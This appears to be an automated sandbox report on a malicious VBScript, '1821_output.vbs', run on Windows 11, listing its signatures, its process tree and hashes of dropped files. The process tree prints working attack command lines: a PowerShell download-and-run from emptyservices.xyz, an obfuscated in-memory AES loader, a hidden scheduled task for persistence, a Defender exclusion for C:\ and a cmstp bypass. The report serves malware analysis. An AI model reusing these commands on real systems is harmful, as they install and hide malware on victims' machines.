Overview

overview

10

Static

static

1

1821_output.vbs

windows10-2004-x64

10

1821_output.vbs

windows7-x64

8

1821_output.vbs

windows10-2004-x64

10

1821_output.vbs

windows10-ltsc 2021-x64

10

1821_output.vbs

windows11-21h2-x64

8

Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    09-12-2024 20:19

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1821_output.vbs

  • Size

    61KB

  • MD5

    6943e4c37b93c2a81a98a81e36d2d5ce

  • SHA1

    ad2ba17165344f88b6bf0befaac528feb8a3280f

  • SHA256

    57bf3620d73728f07bed5cd48af70ca89dc70721b62c084f5f0feebed7f81a4f

  • SHA512

    78034880a195d5dc7729a6c7631a660f9945dd368a86b50b458e70e0191a7953ba47435c242c94ce8548832e4920e08949fcb1aa099d5d7b927da9bc9b69cf80

  • SSDEEP

    768:ni1+nYY2MDjo2CLlIbkrMvrIzkoILj2AA3drdg8KCklQCdUq13ZZIwX+Ay6Iwcgh:iXvlIkgvrWC3ASCk0q13HX+C9czhG

Score
8/10
discoveryexecution

Malware Config

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1821_output.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1064
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2864
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\thc3kpdl\thc3kpdl.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4964
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8F4F.tmp" "c:\Users\Admin\AppData\Local\Temp\thc3kpdl\CSC85118C8425054A34977B2C1FFA8D2C7.TMP"
            5⤵
              PID:5000
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\pxkj35bc.inf
            4⤵
              PID:2032
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4712
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('przvDUO3TwKRjvdqBS3ijZmAMoLKmapNSNZNxjSSlQU='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j86NpELwD0eEb75+pqv1Rw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2940
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_220_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx220.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4032
            • C:\Windows\SysWOW64\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx220.vbs"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4728
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx220.bat" "
                5⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:276
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('przvDUO3TwKRjvdqBS3ijZmAMoLKmapNSNZNxjSSlQU='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j86NpELwD0eEb75+pqv1Rw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx220.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  PID:3508
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:5104
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:652

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        627073ee3ca9676911bee35548eff2b8

        SHA1

        4c4b68c65e2cab9864b51167d710aa29ebdcff2e

        SHA256

        85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

        SHA512

        3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        8ba8fc1034d449222856ea8fa2531e28

        SHA1

        7570fe1788e57484c5138b6cead052fbc3366f3e

        SHA256

        2e72609b2c93e0660390a91c8e5334d62c7b17cd40f9ae8afcc767d345cc12f2

        SHA512

        7ee42c690e5db3818e445fa8f50f5db39973f8caf5fce0b4d6261cb5a637e63f966c5f1734ee743b9bf30bcf8d18aa70ceb65ed41035c2940d4c6d34735e0d7b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        18KB

        MD5

        d3d7967580e9965c4d76222bcf85cf17

        SHA1

        3939b87cb798a3cf6c705a9bd02f41cff0272d0f

        SHA256

        ea6c0272e61b2963703f2b7c962cd11523e50bb439a5379c4f08f6d6db0fed3c

        SHA512

        c6186a9108ae95a897582e39381452f42505498f0c2719aa20d1f5c83511d588038ee5115b09c6f0ee254270f094eb0165d996f7704d800f6135b9990e04bc69

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        900c7fac3ccd57351617c0b7e480dcf8

        SHA1

        262d1a39dc55644003ca46399845b0260ec83aee

        SHA256

        53250ca5ebb80432367e035099f602133ef1d97dee0147d428b6a3360cb29bdd

        SHA512

        f5786e5f38ef9ec8f5eb0e573c6c37fdbae24ae6bd04dfbed281e464d7605ab2e6acb9bb5a2fedd1c833bd101cbeadfe691b191863c67f68030cc0cd8db31999

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RES8F4F.tmp
        Filesize

        1KB

        MD5

        cfdd0bfb8162fcb84b171c70b03e37d0

        SHA1

        17af93f98eedd86e17a60ee2b939f97d5f79020d

        SHA256

        71ba970a668ebf3d2f3e421cbadb7dff3943f85ec22b487303a72597f250bc0d

        SHA512

        b5634f64fdc597ea3c4776c456664c9a085583334d1b4d277d665f1295fc2a1d4436d8dc7aa6339f445b3ac1755fb4ef2186184cba21d7b588836735bab11a5a

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fbkk54wa.3sa.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.bat
        Filesize

        53KB

        MD5

        5658af2134929280550a46a39d5d1254

        SHA1

        757ce11f87e3886b0320fca0bd6bf1f26968a25e

        SHA256

        942cc99875f60e2aef139a7d8e8341409d2dd4625573f32cbe292124838cdeed

        SHA512

        e7ac74d0f9182d563dcb5765c160bec3ea4ede13a0a2612bafc5c8451393f3646430c340df57f1ad02807d9b610f55da0db2c67d531de21e91c21ebfe3cea1c8

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\thc3kpdl\thc3kpdl.dll
        Filesize

        4KB

        MD5

        fd1dae9d3493f59908ca171c10dc065a

        SHA1

        c6575a5077661fbdd5fed111ee66ef7c465082a3

        SHA256

        48353247c977aecf74ada7f3598cc2985a437ddba5455afe1de1330a2ab43ca5

        SHA512

        50e89baf3e4b7e4466f3a200e9d5c43f122244fb6cda4f18ea3bb1462ac63c4d3ca23026dcca3b3dbfd09a0c85c5419dc9eee977d9dae69a6651da08aac8ee00

        Download Submit

      • C:\Users\Admin\AppData\Roaming\latencyx220.vbs
        Filesize

        111B

        MD5

        d437767200acdcffdca79b98ff1c3f2e

        SHA1

        b8bdf847616f4bdbc561aefe3bb0b68ebe1fcc87

        SHA256

        932e1ffb08a7850a60d9dd08034020c12eac929fddfc2b6e2dddf8c3ce2ec247

        SHA512

        ec15aa70d313df3bc9aa647201453d59f34f26d552cbbe42baa9cb726e62d8865d222954181a5d931775e1da4c3c1aaf6494b15491aed65dbe77d9d7722fcb90

        Download Submit

      • C:\windows\temp\pxkj35bc.inf
        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\thc3kpdl\CSC85118C8425054A34977B2C1FFA8D2C7.TMP
        Filesize

        652B

        MD5

        5e93b81a5f29f8f50ef9c6b238a9c493

        SHA1

        3ca0a816830c1c950f12aa1f25a131f328b445d4

        SHA256

        e8c266ceca7880757a6580bc87448595d016c5c494c305b9b39ce759ab6327df

        SHA512

        431aef0ee9fc35f74db3acb390bd03d1eec38245771fa241cda66c8a44d5d5d9c06df1eeb6575d4a35ac9a0355a7ecdaa235b9ef796d6c7ec32cd32561f4fac1

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\thc3kpdl\thc3kpdl.0.cs
        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\thc3kpdl\thc3kpdl.cmdline
        Filesize

        369B

        MD5

        417051dcbfb5e8729a0382c36a6c820e

        SHA1

        ef640bb4dc28711f6f7f5fc5437c9000cac34e68

        SHA256

        8bde9623fd251d91311535fa053340591a82167f21eb49a7bc299ae40e6b34d5

        SHA512

        4dea58075aa4e4d2833ef092621fe3d285ef18057154981e36fd6413b231f81bcbc3c3d2bbddc3a87f797eb160e58da5b1eefe81f480171c71e61a3ec16945d0

        Download Submit

      • memory/2864-42-0x00007FFB4E590000-0x00007FFB4F052000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2864-41-0x00007FFB4E593000-0x00007FFB4E595000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2864-12-0x0000018341BE0000-0x0000018341BFC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/2864-11-0x00007FFB4E590000-0x00007FFB4F052000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2864-46-0x00007FFB4E590000-0x00007FFB4F052000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2864-10-0x00007FFB4E590000-0x00007FFB4F052000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2864-25-0x0000018341C10000-0x0000018341C18000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2864-0-0x00007FFB4E593000-0x00007FFB4E595000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2864-1-0x00000183415B0000-0x00000183415D2000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2940-52-0x0000000005B20000-0x000000000614A000-memory.dmp

        Filesize

        6.2MB

        Download

      • memory/2940-70-0x0000000007A90000-0x0000000007A98000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2940-64-0x0000000006280000-0x00000000065D7000-memory.dmp

        Filesize

        3.3MB

        Download

      • memory/2940-66-0x00000000067A0000-0x00000000067BE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/2940-67-0x00000000067F0000-0x000000000683C000-memory.dmp

        Filesize

        304KB

        Download

      • memory/2940-68-0x0000000007FF0000-0x000000000866A000-memory.dmp

        Filesize

        6.5MB

        Download

      • memory/2940-69-0x0000000006D80000-0x0000000006D9A000-memory.dmp

        Filesize

        104KB

        Download

      • memory/2940-54-0x0000000005AB0000-0x0000000005B16000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2940-71-0x0000000007B80000-0x0000000007C1C000-memory.dmp

        Filesize

        624KB

        Download

      • memory/2940-72-0x0000000007CB0000-0x0000000007CBE000-memory.dmp

        Filesize

        56KB

        Download

      • memory/2940-73-0x0000000008C20000-0x00000000091C6000-memory.dmp

        Filesize

        5.6MB

        Download

      • memory/2940-55-0x0000000006150000-0x00000000061B6000-memory.dmp

        Filesize

        408KB

        Download

      • memory/2940-51-0x0000000005410000-0x0000000005446000-memory.dmp

        Filesize

        216KB

        Download

      • memory/2940-53-0x0000000005A10000-0x0000000005A32000-memory.dmp

        Filesize

        136KB

        Download

      • memory/4032-83-0x0000000006DE0000-0x0000000006E14000-memory.dmp

        Filesize

        208KB

        Download

      • memory/4032-95-0x00000000070E0000-0x00000000070EA000-memory.dmp

        Filesize

        40KB

        Download

      • memory/4032-96-0x00000000072F0000-0x0000000007386000-memory.dmp

        Filesize

        600KB

        Download

      • memory/4032-97-0x0000000007270000-0x0000000007281000-memory.dmp

        Filesize

        68KB

        Download

      • memory/4032-94-0x0000000006E20000-0x0000000006EC4000-memory.dmp

        Filesize

        656KB

        Download

      • memory/4032-93-0x0000000006DA0000-0x0000000006DBE000-memory.dmp

        Filesize

        120KB

        Download

      • memory/4032-84-0x0000000070E00000-0x0000000070E4C000-memory.dmp

        Filesize

        304KB

        Download